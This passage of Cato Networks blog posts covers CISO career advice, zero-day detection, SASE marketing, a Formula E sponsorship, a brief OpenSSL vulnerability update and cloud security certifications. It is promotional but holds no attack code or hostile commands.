Such deep technological experience is gained by building yourself from the bottom-up. While a CISO is a C-level position, a good CISO will still be passionate about learning and understanding technologies. This means learning all the specifics of threats and risks and how to mitigate them. You know you’ve succeeded when you’re able to swap out all members of your team.
At the same time, a good CISO also needs to be involved in business aspects like growth, revenue, quarterly sales, etc.
Maintaining the Balancing Act Between Security and Functionality
The built-in challenge between Security and Business departments revolves around how to ensure an apt layer of security while maintaining business operational agility. Let’s face it, there is no ideal solution or global truth for answering this challenge. If the pendulum swings too far in one direction, either business or security, the risks will be too high or the business won’t be able to function, and the board might as well close the company.
In the past, the “block everything” approach was commonly implemented by companies. First generation CISOs piled up security solutions that blocked any technology or traffic that could potentially be a risk. But in a fast-growing startup that needs to be agile, this approach could quickly become the kiss of death to the business.
Instead, it is best to understand that there is no security without sales and there are no sales without security. A CISO and the security teams are here to serve the business and be growth enablers. This means understanding that every security decision made can impact the company and its development processes and therefore needs to be taken carefully.
When making decisions, I recommend building a decision tree that displays various routes of decision-making and their business outcome. Let’s think of an extreme example. If a CISO needs to determine whether or not to approve Zoom, some of the negative business outcomes of prohibiting Zoom could be:
Impacting internal communicationHindering communication with external entities: customers, vendors, partners, etc.Spending more IT resources on finding and procuring a different communication solutionTaking up employee resources for implementing and training on the new communication solution
On the other hand, the responsibility for understanding the risks of new technologies and tools is the CISO’s domain. When implementing a solution, don’t settle on visibility through advanced monitoring capabilities. You and your team need to be able to track incidents and mitigate them before they become breaches with a significant blast radius.
Goal-setting, Roadmap Creation and KPI Planning
A CISO’s goals and KPIs are derived from their main mission: protecting the organization from threat actors who are attempting to access the company’s assets. This means different things in different organizations, which makes it hard to create a global benchmark for CISOs.
For example, a KPI in one company could be to reduce the percentage of clicks on phishing emails from 5% to 3%. But in another, phishing emails are not a prominent attack vector, so such a KPI would not be considered a high priority.
I recommend you build and approve your CISO goals, roadmap and KPIs with your leadership team and board. This serves two purposes. First, ensuring that these metrics are aligned with business needs. Second, evangelizing the CISO’s role and responsibilities, and therefore creating a higher chance for you to succeed.
Tips for Getting Hired as a First-time CISO
Finding a first-time CISO role can take some time. Here’s how to make yourself stand out with recruiters and CEOs who are reviewing your CV, comparing you to other applicants or considering you for a first-time role:
Become an expert - Specialize in a security or organizational aspect and make yourself the go-to person for that field. This could be a certain application or how a practice is implemented in an organization. This becomes a strong driver for organizations to hire you and want to include you in their organization.Build confidence in your abilities - Create a sense of trust in your abilities to handle various situations, in your technological capabilities and of your business acumen. By doing so, you will be the person who is handed opportunities when they arise.Combine technology and business capabilities - Build up your business experience by taking a business-oriented approach. Don’t be afraid to hop on customer calls, answer customer questions and participate in cross-departmental brainstorming sessions where commercial questions are discussed. You can also become involved with marketing and sales processes to help them streamline their processes.
Take projects from idea to execution - Find an idea that can help the business and bring it to execution. This includes research, building rapport with colleagues, resource allocation and project management. Comprehensive project management will not only show off your leadership skills, it will also help you hone your combination of technological and business capabilities, to help you build yourself up for the role.
Next Steps for Future CISOs of Tomorrow
Your CISO journey might not be the same as your colleagues’, or it might be a textbook career path from security professional to CISO. Either way, your unique characteristics as a CISO are what will make you stand out, not how you got there. By being enthusiastic about what you do, finding creative ways to solve problems and constantly maintaining an understanding of tech and business growth, you will be able to lead security and make the best decisions for your company, which is the real indicator of success.
As security professionals, we are inundated with news stories and articles about cyber attacks and breached companies. Sometimes, attacks become newsworthy because of the attacked...
November 17, 2022
The 3 Worst Breaches of 2022 That You Should Know About (That Didn’t Get Much Press or Attention) As security professionals, we are inundated with news stories and articles about cyber attacks and breached companies. Sometimes, attacks become newsworthy because of the attacked company, for example when it's a notable enterprise. Other times, the attack technique was so unique, that it deserves a headline of its own.
In this blog post, we take a different approach. Instead of naming and shaming, we will review three of the worst breaches and attacker tactics and techniques of 2022 that might have gone by unnoticed, and use them as a way to learn how to better protect ourselves.
This blog post is based on episode #9 of the Cato Networks cybersecurity Master Class (“The 3 Worst Breaches of 2022 That You Probably Haven’t Heard Of”). The Master Class is taught by Etay Maor, Sr. Director of Security Strategy at Cato Networks and an industry recognized cyber security researcher and keynote speaker. You can watch all the episodes of the Master Class, here.
Attack #1: Ransomware: The Sequel
Ransomware as a service is a type of attack in which the ransomware software and infrastructure are leased out to the attackers. In this first case, the threat actors used ransomware as a service to breach the victim’s network. They were able to exploit third-party credentials to gain initial access, progress laterally and ransom the company, all within mere minutes. The swiftness of this attack is unusual. In many cases, attackers stay in the networks for weeks and months before demanding the ransom.
So, how did attackers manage to ransom a company in minutes, with no need for discovery and weeks of lateral movement?
Watch the Master Class to learn more about the history of ransomware, ransomware negotiation and various types of ransomware attacks.
[boxlink link="https://catonetworks.easywebinar.live/registration-the-3-worst-breaches-of-2022?utm_medium=blog_top_cta&utm_campaign=3_worst_breaches_webinar"] The 3 Worst Breaches of 2022 (That You Probably Haven’t Heard Of) | Webinar [/boxlink]
Attack #2: Critical Infrastructure: Sabotaging Radiation Alert Networks
Attacks on critical infrastructure are becoming more common and more dangerous. Breaches of water supply plants, sewage systems and other such infrastructures could put millions of residents at risk of a human crisis. These infrastructures are also becoming more vulnerable, with tools like Shodan and Censys that enable finding vulnerabilities fairly easily.Let Etay Maor take you on a deep dive into ICS (Industrial Control Systems). Why are attacks moving from IT to OT (Operational Technology)? And, in the Master Class, we discuss security solutions for protecting critical infrastructure, like zero trust and SASE.
Attack #3: Ransomware (That Could Have Been Prevented)
The third attack is also a ransomware attack. This time, it consisted of a three steps approach of infiltration, lateral progression over the network, and exfiltration. You’ll learn the ins and outs of this attack, including who the victim is and why their point security solutions were not able to block this attack.Etay Maor conducts a full breach analysis, taking us from a “single-point-of-failure” mindset to a holistic and contextual approach that requires securing multiple choke points.To learn more about each of these three attacks, what to expect in 2022-2023 and how a converged security solution can assist in preventing similar attacks in the future, watch the Master Class.
Zero-day attacks are a growing threat to corporate cybersecurity. Instead of reusing existing malware and attack campaigns that are easily detected by legacy security solutions,...
November 14, 2022
Effective Zero-Day Threat Management Requires Cloud-Based Security Zero-day attacks are a growing threat to corporate cybersecurity. Instead of reusing existing malware and attack campaigns that are easily detected by legacy security solutions, cyber threat actors tune their malware to each campaign or even each target within an organization.
These zero-day attacks are more difficult and expensive to detect, creating strain on corporate security architectures. This is especially true as the growth of corporate IT infrastructures generates increasing volumes of network traffic that must be inspected and secured. Managing cyber risk to corporate IT systems requires security solutions that can scale to meet growing demand.
Zero-Day Threats Are Harder to Detect
Historically, antivirus and other threat detection technologies used signature-based detection to identify malware and other malicious content. After a new threat was identified, a signature was built based on its unique features and added to the signature library. All future content would be compared to this signature, and, if it matched, would be identified as a threat and remediated.
This approach to threat detection requires limited resources and can be highly effective at identifying known threats. However, a signature must first exist for threats to be identified. The growth of zero-day attacks leaves signature-based detection blind to many threats and creates a delay between the emergence of a new threat and solutions’ ability to identify it.
Other approaches to threat detection can identify novel and zero-day threats. For example, anomaly detection identifies deviations from normal behavior that could point to either benign errors or attempted attacks. Behavioral analysis monitors the actions of user accounts, applications, and devices for risky or malicious behaviors that pose a threat to a system.
These forms of threat detection have the ability to provide much more robust protection to an organization’s systems against novel and evolving threats. However, this improved detection comes at a price. In general, anomaly and behavioral detection consume more processing power and require access to larger datasets than traditional, signature-based detection systems. Also, non-signature detection systems have the potential for false positive detections, creating additional alerts for security personnel to sort through.
[boxlink link="https://catonetworks.easywebinar.live/registration-enhancing-your-enterprise-network-security-strategy?utm_medium=blog_top_cta&utm_campaign=enhancing_network_security_webinar"] Enhancing Your Enterprise Network Security Strategy | Webinar [/boxlink]
Legacy Firewall Security Solutions Can’t Keep Up
Zero-day threat detection is essential for protecting against modern cyber threats, but it is also resource-intensive. As traffic volumes increase, the additional work required to identify novel threats can put strain on an organization’s network security architecture.
This is especially true for organizations that rely on legacy next-generation firewalls (NGFWs). Firewall security solutions deployed within an organization’s on-prem data center have limited scalability. If traffic volumes exceed the compute capabilities of an appliance-based solution or software running on a server, then the organization needs to acquire and deploy additional hardware to secure the traffic without compromising network performance. This is especially true if TLS decryption is required for inspection of encrypted traffic as this can exhaust an appliance’s compute capacity.
As the cyber threat landscape evolves, organizations will need to identify and respond to more numerous and sophisticated cyber threats, which increases the resource requirements of cyber threat detection. With legacy, appliance-based solutions deployed on-prem, companies are already forced to choose between properly protecting their environments against cyber threats and the performance of their corporate networks.
Cloud-based Security is Essential for Modern Threat Management
One of the main limitations of security solutions is that effectively inspecting and securing network traffic is computationally expensive. With limited resources, TLS decryption and in-depth inspection of network traffic can cause performance issues, especially as corporate networks and their traffic bandwidth increase.
The best way for companies to keep pace with the growing resource requirements of security is to take advantage of cloud scalability and adaptability. Cloud-native security solutions can expand the resources that they consume as needed to cope with growing network traffic volumes and the associated cost of security inspection and threat detection and response.
Secure Access Service Edge (SASE) solutions take full advantage of the benefits of the cloud to optimize corporate network security. SASE solutions converge many network and security functions into a single solution, eliminating the redundancy and waste of standalone solutions. Additionally, as cloud-native solutions, SASE solutions elastically scale to meet growing network traffic volumes or the resource requirements of expensive security operations.
In addition to solving the problem of the resource consumption of security functions, SASE solutions also provide numerous other benefits, including:
Greater Visibility: SASE solutions integrate traffic inspection and threat detection across the entire corporate WAN and not only the internet. This provides improved security visibility and additional context regarding cyber threats. Improved Threat Detection: SASE solutions can also leverage this increased visibility — as well as threat intelligence data — to more accurately identify threats to the organization. Security integration also means that threat response activities can be coordinated across the corporate WAN, providing better protection against distributed attacks. Enhanced Network Performance: SASE solutions are globally distributed and integrate network optimization functions as well as security features. Traffic can be inspected and secured at the nearest SASE point of presence before being optimally routed to its destination.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about how Cato SASE Cloud’s threat detection capabilities can help protect your organization against zero-day threats with a free demo.
Ever since the 1990s, IT has been dominated by appliance-centric architecture. But in 2015, Cato revolutionized this paradigm by envisioning networking and security delivered as...
November 10, 2022
SASE Vendor Selection: Should You Focus on Outcomes or Tools? Ever since the 1990s, IT has been dominated by appliance-centric architecture. But in 2015, Cato revolutionized this paradigm by envisioning networking and security delivered as a converged, cloud-native service. This evolution was not unlike the massive shift created by AWS’s global cloud service, which provided a new kind of infrastructure that supported scalability, resiliency, elasticity, security, connectivity and global distribution (and more).
While AWS is not necessarily the cheapest option, businesses today still choose AWS (or Azure, Google Cloud and other public cloud providers) so they can focus their IT teams on business critical projects and strategic initiatives, instead of requiring them to maintain and manage infrastructure. In other words, AWS became an extension of the IT team, turning it into a business enabler.
Cato is following a similar path. The Cato SASE Cloud provides high performance routing and security inspection of enterprise network traffic. To ensure high availability and maximal security posture, the Cato SASE cloud is optimized and maintained by our professionals from DevOps, networking and security. As a result, Cato too is an extension of the IT team, while owning the outcome: a secure and resilient infrastructure. This blog post compares Cato SASE to legacy applications while demonstrating the strategic business value of Cato. A more in-depth comparison can be found in the whitepaper which this blog post is based on. Click here to read it.
Cato SASE Cloud vs. Legacy Appliances
How is the value of Cato justified? While legacy appliances are tools, Cato SASE Cloud is built for outcomes: highly available, scalable and secure connectivity for everyone, everywhere.
Disruption-free capacity handlingNo infrastructure maintenance24x7 NOC24x7 SOC24x7 Support
Tools on the other hand create:
Complexity when deploying and planning capacity A capacity vs. usage tradeoffDifficulties maintaining the security postureAn extended attack surface of appliancesLimited support effectiveness and limited customer environment access
[boxlink link="https://www.catonetworks.com/resources/outcomes-vs-tools-why-sase-is-the-right-strategic-choice-vs-legacy-appliances/?utm_medium=blog_top_cta&utm_campaign=features_vs_outcomes"] The Pitfalls of SASE Vendor Selection: Features vs. Strategic Outcomes | Whitepaper [/boxlink]
Cloud-Delivered vs. Appliance-Delivered Features
Features differ in their deployment, management, scalability, and effectiveness. Let’s look at some examples of these differences through the lens of managed vs. standalone features and adaptable vs. rigid features.
Managed vs. Standalone Features
Managed - Cato’s IPS is always in a fully optimized security posture. We evaluate threats and vulnerabilities, develop mitigations and deploy only after ensuring performance isn’t negatively impacted.
Standalone - An IPS from an appliance vendor requires the IT team to deploy, assess the deployment impact on performance and ensure all appliances are kept up-to-date. Consequently, these teams are in “detect mode” instead of “prevent mode”.
Adaptable vs. Rigid Features
Adaptable - Cato’s cloud-native architectures make inspection capabilities available whenever there are new loads or new requirements, at any scale or location, and seamlessly.
Standalone - When locations and capacity are constrained, it’s the customer’s responsibility to predict future inspection capabilities. As a result, new branches, users and applications turn into business disruptors, instead of driving growth.
“DIY” is a good solution in some cases, but not for enterprises looking to achieve agile and flexible networking and security infrastructure. The required infrastructure expertise coupled with the lack of IT resources make DIY unsustainable in the long haul. Instead, a new partnership model with technology-as-a-service providers is required. This partnership can help organizations achieve the outcomes they need to drive their business and achieve their strategic goals.
Read more from the whitepaper “The Pitfalls of SASE Vendor Selection: Features vs. Strategic Outcomes”, for a closer look.
In the new digital world, we’re no longer restricted by borders and can innovate with our colleagues and partners all over the world. ABB FIA...
Driving Into Action: Our New Partnership with the TAG Heuer Porsche Formula E Team In the new digital world, we’re no longer restricted by borders and can innovate with our colleagues and partners all over the world. ABB FIA Formula E World Championship has been growing year-on-year and has become the testing ground for the latest innovations not only for Motorsport, but the automotive industry as a whole. So, I am thrilled to announce that today we are launching a partnership with the TAG Heuer Porsche Formula E Team as its official SASE partner.
Porsche has a rich racing history dating back to the 1950s. In Formula E’s sixth season, Porsche made its long-awaited return to top-flight single-seater racing and has continued to make positive strides over the past three years. Last season saw the team secure their first race win in Formula E with an impressive 1-2 finish in Mexico City.
At Cato, we pride ourselves on helping our customers collaborate securely from anywhere on the globe by eliminating the complexities of point solutions and delivering secure network architecture through the power of a single-vendor SASE cloud platform. Global motorsport competitions are often labeled as traveling circuses, as they assemble, race, pack up, and move on to the next country on a weekly and monthly basis. The nature of the Formula E racing season, along with the team’s extensive use of technologies and data, has meant that cloud-native networking and security infrastructure have become a cornerstone of the team’s strategy.
Click here to enlarge the image
The decisions that the TAG Heuer Porsche team makes are comparable to those of any business organization. When you need to analyze every data point from tire temperatures to battery depletion in real-time and the team’s HQ is located on the other side of the world, it’s vital the team can make split second decisions to make a difference on track.
These decisions are informed by vast datasets that the team has collected throughout each Formula E event and the car’s extensive development. These data-informed insights are critical for the team’s on-track performance and must be taken in a way that minimizes security and operational risks as well as optimal application and data access.
Cato will play an important role helping the TAG Heuer Porsche Formula E team to optimize operations and provide secure access to the network and SaaS applications all season long. We are excited and optimistic about the season and working together to… WIN!
“Join us by supporting the TAG Heuer Porsche Formula E Team when Formula E Season 9 kicks off in Mexico City on January 14th and stay tuned for more details on the partnership in the coming weeks.”
Find out more about the TAG Heuer Porsche Formula E team here: https://motorsports.porsche.com/international/en/category/formulae
The new high severity vulnerabilities in OpenSSL — CVE-2022-3602 (Remote Code Execution) and CVE-2022-3786 (Denial of Service) – were disclosed this week. What is OpenSSL?...
The OpenSSL Vulnerability: A Cato Networks Labs Update The new high severity vulnerabilities in OpenSSL -- CVE-2022-3602 (Remote Code Execution) and CVE-2022-3786 (Denial of Service) – were disclosed this week.
What is OpenSSL?
OpenSSL is a popular open-source cryptography library that enables secured communications over the Internet in part through the generation of public/private keys and use of SSL and TLS protocols.
What Are the Vulnerabilities?
The vulnerabilities were found in OpenSSL versions 3.0.0. to 3.0.6. They occur after certificate verification and then only after unlikely conditions are met either signing of a malicious certificate by a certificate authority (CA) or after an application continues verifying a certificate despite failing to identify a trusted issuer.
[boxlink link="https://www.catonetworks.com/sase-quarterly-threat-research-reports/?utm_source=blog&utm_medium=top_cta&utm_campaign=q_reports"] SASE Quarterly Threat Research Reports | Go to Reports [/boxlink]
With CVE-2022-3602, a buffer overrun can be triggered in X.509 certificate verification, enabling an attacker to craft a malicious email address to overflow four attacker-controlled bytes on the stack, which could result in a crash, causing a Denial of Service (DoS), or remote code execution (RCE). With CVE-2022-3786, a buffer overrun can also be triggered in X.509 certificate verification, but specifically in name constraint checking. Again, the attacker can craft a malicious email address in a certificate to overflow an arbitrary number of bytes containing the “.” Character (decimal 46) on the stack, resulting in a crash causing a DoS. (Read the OpenSSL Security Advisory here for detailed information about the attacks.)
What’s the Impact on Cato SASE Cloud? None.
While Cato does use OpenSSL neither vulnerability impacts our infrastructure. Neither our cloud assets, the Cato Socket or the Cato Client use a vulnerable version of OpenSSL.
What Actions is Cato Taking?
Cato Networks Research Labs is investigating the unlikely case of exploitation attempts and considering adding new IPS signatures to block them. Currently, we have not seen incidents or published reports of exploitation attempts in the wild.
What Actions Should I Expect from Other Tech Vendors?
The attack is severe enough that all vendors should upgrade affected appliances and software. You can see a list of affected software here. While patching and protecting users at Cato can happen instantly, such as with Log4j, that’s not the case with all solutions. Expect exploits of the OpenSSL vulnerabilities to linger as we saw with Log4j.
Cato Networks Research Labs will continue to monitor the situation and update accordingly.
Although managing on-premises servers may be costly and time-consuming, businesses at least have some control when it comes to patching say, a newly discovered exploit...
How To Identify a Trusted Cloud Provider: The Essential Security Certifications and Practices You Should Look For Although managing on-premises servers may be costly and time-consuming, businesses at least have some control when it comes to patching say, a newly discovered exploit or stopping a zero-day attack. Not so with the cloud. Cloud-based estates are at the mercy of cloud service providers to apply relevant patches and maintain the security of the infrastructure that they’re using.
That’s why it’s so important for organizations to ensure they’re partnering with trusted cloud providers, who can be relied upon to maintain an appropriate level of safeguarding and discipline when it comes to their security. And one of the most important ways they can establish the trustworthiness of a vendor is by seeking out those who have obtained relevant certifications.
SOC 1 and 2: Ever Popular and Important
There are several key accreditations that IT vendors and service providers can attain in order to demonstrate their competency in various areas, such as data privacy or information security.
One of the most frequently requested certifications by customers when delivering due diligence are SOC 1 and SOC 2 Type 2 standards established by the American Institute of CPAs (AICPA).
SOC 1 helps organizations examine and report on their internal controls relevant to their customer's financial statements. At the same time, SOC 2 focuses on controls relevant to the security, availability, processing, integrity, confidentiality, and privacy of customer's data. Cato is annually audited by a 3d party to ensure procedures and practices are followed and never neglected.
[boxlink link="https://www.catonetworks.com/resources/casb-demo/?utm_medium=blog_top_cta&utm_campaign=cato_demo_controlling_cloud"] Controlling Cloud Usage IT with Cato CASB | Cato Demo [/boxlink]
The ISO Family Is Well Known for Good Reason
The ISO27000 family of certifications is among the most popular and well-known. These certifications are independently verified and internationally recognised and are often regularly updated to reflect current best practices. When comparing cloud providers, IT leaders should look for those that adhere to a variety of well-known industry standards relevant to their business globally. Another recommendation is to focus not only on general security certifications, but also on cloud security and privacy protection as they become a prerequisite for doing business.
Cato Networks, for example, holds many certifications within this family, such as ISO27001, which sets out the specification for an information security management system (ISMS). This includes policies, goals and objectives, statement of applicability (SOA), roles and responsibilities (R&R), risk assessment, and treatment methods. This is one of the most well-known and requested certifications internationally, creating a “security first” approach in the organizational culture.
Achieving ISO27001 certification is often the first step on a vendor’s journey and is a prerequisite for earning further related accreditations. ISO27017 – also held by Cato – is one of the security standard’s extensions for cloud service providers, and addresses access control, cryptography, physical and environmental security, information lifecycle management, and other controls in the cloud. ISO27017 can help win new business as many organizations now worry about cloud security and want to ensure their assets are protected wherever they are stored or processed.
ISO27701 and ISO27018, meanwhile, are data privacy extensions that demonstrate that Cato has met the guidelines for implementing measures to protect Personally Identifiable Information (PII). ISO27701 focuses on establishing, implementing, and maintaining privacy information management system (PIMS), managing privacy risks related to PII, and helps to comply with GDPR and other data protection regulations. ISO27018 focuses on PII protection in the cloud and offers guidance on implementing privacy by design.
In order to achieve ISO27701 and ISO27018 extensions, organizations like Cato must follow the most comprehensive data controls delivered by an internationally recognized standard, which makes it easier for Cato and its solutions to provide assurances about their security and data protection practices. Cloud vendors should be constantly updating and adding to the library of certifications that they’ve achieved in order to demonstrate a deepening of their skills, and a continued commitment to their customers’ safety.
These certifications – as well as the many others held by reputable cloud providers such as Cato – are useful in proving a firm commitment to high standards of security and privacy. They can also play a valuable role in ensuring compliance with key regulatory frameworks, including the European GDPR, and the California Consumer Privacy Act – which is vital for supporting clients who are bound by these laws.
What to Consider Beyond Certifications
Certifications only tell part of the security story, however. In addition to accreditations, the actions of a company – as well as its attitudes and approaches to compliance - can also indicate whether a provider is serious about security. Along with recognizing the need for certification, and the important role that compliance plays in the business, organizations must continually evolve in their implementation, maintenance, and monitoring of compliance issues. This is why Cato is constantly investing in new capabilities, tools, and approaches which are needed to demonstrate accurate, deep, and real-time compliance with the security and privacy standards it adheres to.
For instance, while more traditional development life cycles places security and compliance testing as one of the final stages a solution would go through prior to deployment, Cato follows the ‘Shift Left’ approach. This concept, first popularised within the DevOps community, involves injecting processes such as testing and security into an earlier phase of project development, in order to identify potential problems more quickly and easily.
Another tactic borrowed from the world of DevOps is the adoption of data-driven decision-making. Instead of relying on data reflecting a specific point in time to conduct compliance audits, real-time data from live systems now allows for continuous monitoring and comparison with security standard. This provides a much more in-depth picture of compliance posture, as opposed to the high-level gaps revealed by more static methodologies.
In-depth, accurate data is also used much more heavily in risk models, which are now created using quantitative rather than qualitative analysis. This gives much better visibility of genuine risk factors and their potential impact, without relying on subjective perceptions. This reflects the broader change in attitudes towards compliance across the industry; where previously compliance tasks would have been handled by technical personnel and consultants, organizations will now often have entire teams dedicated to compliance, including representatives from GRC departments and the DPO’s office, which maintain ownership of related issues on a continuous basis.
Certifications are Essential for Building a Trusted Relationship
The relationship between a cloud service provider and their customer depends on trust. Ensuring that the right certifications are in place to demonstrate an ability to support the full range of client needs is an essential part of building and maintaining that trust. A robust certification and compliance posture is more than ever an essential part of security - and it can also create opportunities and win business worldwide if well managed and updated.
As businesses grow, they should take pains to ensure that their cloud provider – and the maturity of their certifications – is growing along with them. The commitment and expertise that these accreditations signify are invaluable for organizations as they scale and bespeak a partner that’s willing to go the distance. Remember: security is a marathon, not a sprint.
The cybersecurity industry is well known for its buzzwords. Every year, a new word, phrase, or acronym emerges to describe the latest and greatest tool...
If You Want a True Security Platform, You Need SASE The cybersecurity industry is well known for its buzzwords. Every year, a new word, phrase, or acronym emerges to describe the latest and greatest tool that is absolutely essential to an organization’s ability to protect itself against cyber threats. Recently, the focus has been on ‘security platforms’, which are intended to simplify security architectures by consolidating many security capabilities within a single solution. This approach can provide many benefits, but many of these so-called ‘security platforms’ lack the ability to meet the security needs of the modern business.
The Goal: Combining Many Security Functions Within a Single Solution
Companies face a variety of cyber threats, a problem that is exacerbated by the evolution of corporate IT infrastructures and the cyber threat landscape. With the rise of cloud computing, remote work, and Internet of Things (IoT) and mobile devices, cyber threat actors have many potential targets for their attacks.
Historically, companies addressed these new cyber risks by selecting security solutions that were targeted at solving a certain problem or closing a particular security gap. For example, an organization may augment firewall security solutions with the threat prevention capabilities of an intrusion prevention system.
However, this approach often results in complex, unusable security architectures. With many standalone security solutions, corporate security teams are overloaded with security alerts, waste time configuring and context switching between solutions, and must contend with security tools that have both overlapping functionality and leave visibility and security gaps.
With the cybersecurity skills gap making it difficult to attract and retain essential security talent, many companies are focusing their efforts on simplifying and streamlining their security architectures. Integrated security platforms are the new goal, combining many security functions within a single solution in an attempt to reduce or eliminate the challenges caused by security architectures composed of an array of standalone solutions.
[boxlink link="https://catonetworks.easywebinar.live/registration-enhancing-your-enterprise-network-security-strategy?utm_medium=blog_top_cta&utm_campaign=enhancing_network_security_webinar"] Enhancing Your Enterprise Network Security Strategy | Webinar [/boxlink]
A Security Platform Needs to Meet a Company’s Security Needs
An effective security platform is one that is designed to meet the needs of the modern, growing corporate network. This includes the following capabilities:
Product Consolidation: Product consolidation is the key selling point of a security platform since it allows organizations to eliminate the complexity and overhead of managing many standalone solutions. Security platforms should offer several security functions — such as a next-generation firewall (NGFW), zero-trust network access (ZTNA), intrusion prevention system (IPS), cloud access security broker (CASB), and more — and be managed and monitored via a single pane of glass.
Universal Protection: The corporate WAN is rapidly expanding and includes on-prem, cloud-based, and remote devices. A security platform must be able to secure all of the corporate WAN without negatively impacting network performance, such as the latency caused by backhauling network traffic to an organization’s on-prem security architecture for inspection and policy enforcement.
Scalable Protection: Corporate networks are growing rapidly, and the introduction of cloud infrastructure, IoT devices, and other endpoints increases the volume of traffic flowing over the corporate WAN. Security platforms must be able to scale to secure growing traffic volumes without negatively impacting network performance or requiring the deployment of additional solutions.
Cloud Support: Cloud adoption is near-universal across organizations, and 80% of companies have deployed multi-cloud infrastructure. Cloud-based and on-prem infrastructure differs significantly, and security platforms should operate effectively and provide strong risk management across an organization’s entire IT architecture.
Consistent Policy Enforcement: Consistently enforcing security policies across on-prem and cloud-based infrastructure is complex, especially in multi-cloud environments where different cloud providers offer different sets of security tools and configuration options. A security platform should enable an organization to enforce security policies across all of the environments that compose an organization’s cloud infrastructure.
The goal of replacing standalone security solutions with security platforms is to simplify and streamline security. To accomplish this, security platforms must meet all of an organization’s security needs. Otherwise, companies will need to deploy additional security tools to close gaps, starting the cycle over again.
SASE is the Ultimate Security Platform
Replacing an organization’s complex security infrastructures with an integrated security platform can be a significant challenge. With diverse environments, each with its own unique security needs and limitations, identifying and configuring a solution that is universally effective can be difficult.
Secure Access Service Edge (SASE) is the only security platform with a guaranteed ability to meet all of the security requirements of the modern business. Some of the key capabilities of SASE include:
Cloud-Native Protection: SASE solutions are deployed within cloud points of presence (PoPs). SASE’s cloud-native design ensures that it can scale with the business and can secure corporate devices wherever they are.
Converged Security: SASE solutions converge many network and security functions — including ZTNA, IPS, and firewall security functions — into a single solution. This convergence eliminates the complexity caused by standalone solutions and can also enable increased efficiency and optimization.
Network-Level Protection: SASE secures the corporate network by sending all traffic through a SASE PoP en route to its destination. This ensures consistent security policy enforcement and management across all of an organization’s IT environments.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about consolidating and streamlining your organization’s security architecture with Cato SASE Cloud by signing up for a free demo today.
Organizations are in the midst of an exciting period of transformational change. Legacy IT architectures and operational models that served enterprises over the past three...
SASE, SSE, ZTNA, SD-WAN: Your Journey, Your Way Organizations are in the midst of an exciting period of transformational change. Legacy IT architectures and operational models that served enterprises over the past three decades are being re-evaluated. IT organizations are now driven by the need for speed, agility, and supporting the business in a fiercely competitive environment.
What kind of transformation is needed to support the modern business? The short answer is “cloudification.” Migration of applications to the cloud had been going on for a decade, offloading complex datacenter operations away from IT, and in that way increasing business resiliency and agility. However, the migration of other pillars of IT infrastructure, such as networking and security, to the cloud is a newer trend.
Transforming Networking and Security for the Modern Enterprise
In 2019, Gartner outlined a new architecture, the Secure Access Service Edge (SASE), as the blueprint for converging a wide range of networking and security functions into a global cloud service. Key components include SD-WAN, Firewall as a Service (FWaaS), Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), Data Loss Prevention (DLP), and Zero Trust Network Access (ZTNA). Two years later, Gartner created a related framework focused exclusively on the security pillar of SASE, the Security Service Edge (SSE).
By moving to a converged cloud design, SASE and its major components of SD-WAN and SSE aim to eliminate the pile of point solutions, management consoles, and loose integrations that led to a rigid, costly, and complex infrastructure. This transformation addresses the root causes of IT's inability to move at the speed of business – budgetary constraints, resource limitations, and insufficient technical skills.
The Journey to a Secure Network for the Modern Enterprise
As customers started to look at the transformational power of SASE, many saw a long journey to move from their current set of appliances, services, and point solutions to a converged SASE platform. IT knows too well the challenges of migrating from proprietary applications in private datacenters to public cloud applications and cloud datacenters, a journey that is still on going in many enterprises today.
How should enterprise IT leaders proceed in their journey to transform networking and security? There are two dimensions to consider: the use cases and the IT constraints.
Driving Transformation through Key Use Cases
There are several key use cases to consider as the entry point to the networking and security transformation journey. Taking a platform approach to solving these immediate challenges will make addressing future challenges much easier and more cost-effective as the enterprise proceeds towards a full infrastructure transformation.
Work from Anywhere (ZTNA)
During COVID the need for secure remote access (ZTNA) became a critical IT capability. Enterprises must be ready to provide the entire workforce, not just the road warriors, with optimized and secure access to applications, on-premises and in the cloud. Deploying a ZTNA solution that is part of the SSE pillar of a single-vendor SASE platform overcomes the scalability and security limitations of appliance-based VPN solutions. ZTNA represents a “quick win,” eliminating a legacy point-solution and establishes a broad platform for continued transformation.
Cloud access control and sensitive data protection (CASB/DLP)
The adoption of public cloud applications enables users to get work done faster. However, while the cloud may only be a click away, unsanctioned applications increase business risk through security breaches, compliance violations, and data loss. Deploying the CASB and DLP capabilities in the SSE portion of a SASE platform addresses the need to control access to the cloud and protect sensitive data.
Firewall elimination (FWaaS)
One of the biggest challenges in managing an enterprise security footprint is the need to patch, upgrade, size, and retire discrete appliances. With Firewall as a Service (FWaaS), enterprises relieve themselves of this burden, migrating the WAN security and routing of firewall appliances to the cloud. FWaaS is not included in Gartner’s SSE definition but is a part of some SSE platforms, such as Cato SSE 360.
Migration of MPLS to Secure SD-WAN
The legacy MPLS services connecting locations are unsuitable for supporting cloud adoption and the remote workforce. By migrating locations from MPLS to SD-WAN and Internet connectivity, enterprises install a modern, agile network well suited toward business transformation. Customers may choose to preserve their existing security infrastructure, initially deploying only edge SD-WAN and global connectivity capabilities of a SASE platform, like Cato SASE Cloud. When ready, companies can migrate locations and users to the SSE capabilities of the SASE platform.
Whether the enterprise comes from networking or security, the right platform should enable a gradual journey to full transformation. Deploying SD-WAN that is a part of a single-vendor SASE platform, enables future migration of the security infrastructure into the SSE pillar. Conversely, deploying one of the security use cases of ZTNA, CASB/DLP or FWaaS that are part of a converged SSE platform enables seamless accommodation of other security use cases. And if SSE is a part of a single-vendor SASE platform, migration can be further extended into the network to address migration from MPLS or third-party SD-WAN into a full SASE deployment.
Accelerating Your Journey by Overcoming Enterprise IT Constraints
The duration and structure of your journey is impacted by enterprise constraints. Below are some examples and best practices we learned from our customers on dealing with them.
Retiring existing solutions
